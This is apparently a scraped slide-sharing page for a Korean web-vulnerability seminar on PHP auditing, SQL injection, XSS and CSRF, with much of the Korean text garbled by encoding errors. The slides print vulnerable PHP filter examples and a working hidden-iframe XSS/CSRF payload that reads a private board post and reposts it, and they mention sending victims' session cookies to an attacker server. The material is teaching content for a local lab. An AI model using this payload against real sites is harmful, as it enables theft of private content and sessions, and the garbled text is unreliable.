Recommended Web vulnerability seminar4
Web vulnerability seminar2
Web vulnerability seminar2
PHP๋ฅผ ์ด์ฉํ ๊ฐ๋จํ ๋ฐฉ๋ช
๋ก ๋ง๋ค๊ธฐ
Laravel แ
แ
ฉ แแ
ขแแ
ฎแแ
ณแซ แแ
ฅแแ
ฅแแ
กแแ
ตแแ
ณ #2
แ
แ
ฆแแ
ตแฏแแ
ณ แแ
ชแซแแ
งแผ แแ
งแซแแ
ฎ
Mysql old password ๊นจ๊ธฐ
์ 4ํ DGMIT R&D ์ปจํผ๋ฐ์ค : REST API - ๋ฆฌ์์ค ์งํฅ์ ์ํคํ
์ฒ
ํดํน ๊ธฐ๋ฒ๊ณผ ๊ธฐ๋ณธ์์ by issac
ํ์ด์ฌ ์น ํ๋ก๊ทธ๋๋ฐ 2ํ
ํ์ด์ฌ ์นํ๋ก๊ทธ๋๋ฐ 1ํ
[PyConKR 2014] 30๋ถ๋ง์ ๋ฐ๋ผํ๋ ๋์์ฑ ์คํฌ๋ํผ
แแ
กแแ
กแแ
ณแแ
ณแ
แ
ตแธแแ
ณ ๊ธฐ์ด
๋งํ๋ ์คํฐ๋ ์ฒซ ๋ฒ์งธ ๋ง๋จ Node.js
๋งํ๋์คํฐ๋ ๋๋ฒ์งธ๋ง๋จ Express(20151025)
ํ์ด์ฌ ๋ฐ์ดํฐ๋ฒ ์ด์ค ์ฐ๊ฒฐ 1ํ
ํ์ด์ฌ ๋ฐ์ดํฐ๋ฒ ์ด์ค ์ฐ๊ฒฐ 2ํ
์น ํฌ๋กค๋ง (Web scraping) ์ ์ดํด
How to find_vulnerability_in_software
Software Security - Vulnerability&Attack
More Related Content Web vulnerability seminar4
Web vulnerability seminar2
Web vulnerability seminar2
PHP๋ฅผ ์ด์ฉํ ๊ฐ๋จํ ๋ฐฉ๋ช
๋ก ๋ง๋ค๊ธฐ
Laravel แ
แ
ฉ แแ
ขแแ
ฎแแ
ณแซ แแ
ฅแแ
ฅแแ
กแแ
ตแแ
ณ #2
What's hot (20) แ
แ
ฆแแ
ตแฏแแ
ณ แแ
ชแซแแ
งแผ แแ
งแซแแ
ฎ
Mysql old password ๊นจ๊ธฐ
์ 4ํ DGMIT R&D ์ปจํผ๋ฐ์ค : REST API - ๋ฆฌ์์ค ์งํฅ์ ์ํคํ
์ฒ
ํดํน ๊ธฐ๋ฒ๊ณผ ๊ธฐ๋ณธ์์ by issac
ํ์ด์ฌ ์น ํ๋ก๊ทธ๋๋ฐ 2ํ
ํ์ด์ฌ ์นํ๋ก๊ทธ๋๋ฐ 1ํ
[PyConKR 2014] 30๋ถ๋ง์ ๋ฐ๋ผํ๋ ๋์์ฑ ์คํฌ๋ํผ
แแ
กแแ
กแแ
ณแแ
ณแ
แ
ตแธแแ
ณ ๊ธฐ์ด
๋งํ๋ ์คํฐ๋ ์ฒซ ๋ฒ์งธ ๋ง๋จ Node.js
๋งํ๋์คํฐ๋ ๋๋ฒ์งธ๋ง๋จ Express(20151025)
ํ์ด์ฌ ๋ฐ์ดํฐ๋ฒ ์ด์ค ์ฐ๊ฒฐ 1ํ
ํ์ด์ฌ ๋ฐ์ดํฐ๋ฒ ์ด์ค ์ฐ๊ฒฐ 2ํ
์น ํฌ๋กค๋ง (Web scraping) ์ ์ดํด
Viewers also liked (15) How to find_vulnerability_in_software
Software Security - Vulnerability&Attack
Codegate 2013 Junior - Music Player Exploit
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Web vulnerability seminar1
์ทจ์ฝ์ (Vulnerability) db ๊ตฌ์กฐ ์ค๋ช
MBFuzzer : MITM Fuzzing for Mobile Applications
Inc0gnito fuzzing for_fun_sweetchip
Fuzzing underestimated method of finding hidden bugs
[2014 CodeEngn Conference 10] ์ฌ์ค๋ณด - ๊ธ์ ์ด ํ์ํฉ๋๋ค
FUZZING & SOFTWARE SECURITY TESTING
Similar to Web vulnerability seminar3 (8) XSS ์ ๋ํด์ ์์๋ณด์. [์ค์ต ํฌํจ]
Amazed by aws 2nd session
XSS(Cross site scripting) - Kitworks Team Study
แแ
กแแ
ก แแ
ฐแธ แแ
ขแแ
กแฏ แแ
ตแแ
กแจแแ
กแแ
ต (3์ฃผ์ฐจ : ์คํ๋ง ์น ๊ฐ๋ฐ)
NODE.JS ๊ธ๋ก๋ฒ ๊ธฐ์
์ ์ฉ ์ฌ๋ก ๊ทธ๋ฆฌ๊ณ , real-time ์ดํ๋ฆฌ์ผ์ด์
๊ฐ๋ฐํ๊ธฐ
[D2 campus seminar]แแ
ขแแ
กแฏแแ
กแแ
ก แแ
ฉแจ แแ
กแฏแแ
กแแ
ฃ แแ
กแฏ แแ
ฉแแ
กแซแแ
ตแแ
ฃแแ
ต
Web vulnerability seminar32. Contents
$ PHP + Source code auditing
$ DB & SQL injection
$ XSS & CSRF
$ Something Injection
12. ๋ฌธ์ ๊ฐ ๋๋๊ฒ?
$ ์คํฌ๋ฆฝํธ๊ฐ ์ ํ๋ค๋ ๊ฒ์ ๋ด๊ฐ ์ํ๋ ํ
๋์ ์ผ๋ถ ํ ์ ์๋ค๋ ์ด์ผ๊ธฐ.
$ ํ์ฌ ํ์ด์ง์์ ์๋๋ฐฉ์ด ๊ฐ์ง๊ณ ์๋ ์ฟ
ํค(์ธ์
) ๊ฐ์ ๋ด ์๋ฒ๋ก ์ ์กํด์ ๊ธฐ๋ก ํ
์ ์๋ค๋ฉด?
18. With filtering 2
Source
$q = $_GET[inp];
if(eregi("script",$q))
exit("HAHA. Do not try XSS");
echo $q;
192.168.1.25/web/xss/test2.php
19. With filtering 3
Source
$q = $_GET[inp];
if(eregi("script|alert",$q))
exit("HAHA. Do not try XSS");
echo $q;
192.168.1.25/web/xss/test3.php
24. XSS = XSS
$ Stored๋ก ๊ฐ๋ฅํ ๋ชจ๋ ๊ณต๊ฒฉ์ Reflected ๋ก
๋ ๊ฐ๋ฅํจ.
29. Return To XSS
$ <script ~~>๋ก ์๋ฒ์ ์์ฒญ์ ๋ณด๋ด์!
๊ด๋ฆฌ์๊ฐ ์ฝ๊ฒ ํ์ฌ ๋น๋ฐ๊ธ์ ์ฝ์ด๋ณด์!
30. ์ค์ต
$ ๊ธ์ฐ๊ธฐ ์์
<iframe src =
'http://127.0.0.1/web/csrf/board/write_ok.p
hp?user_id=TEST&title=qwer&pw=&conte
nts=zxcv' width=0 height=0
frameborder=0/>
32. ๋น๋ฐ๊ธ์ ๋นผ์ต์๋ค.
<script>
function sending(html)
{
var f = document.getElementById("csrf");
var a = unescape(html)
var c =
"http://127.0.0.1/web/csrf/board/write_ok.php?user_id=TEST&title=qwwer&pw=aa&contents="+a;
if(html != "")
f.src=c;
else
f.src ="";
}
document.write(โ<iframe id =โcsrfโ src =http://127.0.0.1/web/csrf/board/view.php?num=70 width=0px
height=0px frameborder=0 onload =sending(this.contentWindow.document.body.innerHTML)></iframe>")
</script>
35. Function
function sending(html)
{
var f = document.getElementById("csrf");
var a = unescape(html)
var c =
"http://127.0.0.1/web/csrf/board/write_ok.php?user_id=TEST&ti
tle=qwwer&pw=aa&contents="+a;
if(html != "")
f.src=c;
else
f.src ="";
} src=http://127.0.0.1/web/csrf/board/view.php?num=70src=http://127.0.0.1/web/csrf/board/write_ok.php?user_
id=TEST&title=qwwer&pw=aa&contents=
39. ์์ฝ
$ ๊ฒ์ํ์ ๋ชจ๋ ์คํฌ๋ฆฝํธ๋ฅผ ํ์ฉํ์ง ์๊ณ
๋ฑ๋ฑํ๊ฒ ๊ธ์ ์ฐ๊ฒ ํ๋ฉด ๋ฉ๋๋ค..
$ ์คํฌ๋ฆฝํธ๋ฅผ ์ ๊ณตํด์ผ ํ ๊ฒฝ์ฐ, ์ ๊ทํํ์
์ ํตํด ์ง์ ๋ ํํ์์ ๋ฒ์ด๋๋ฉด OUT!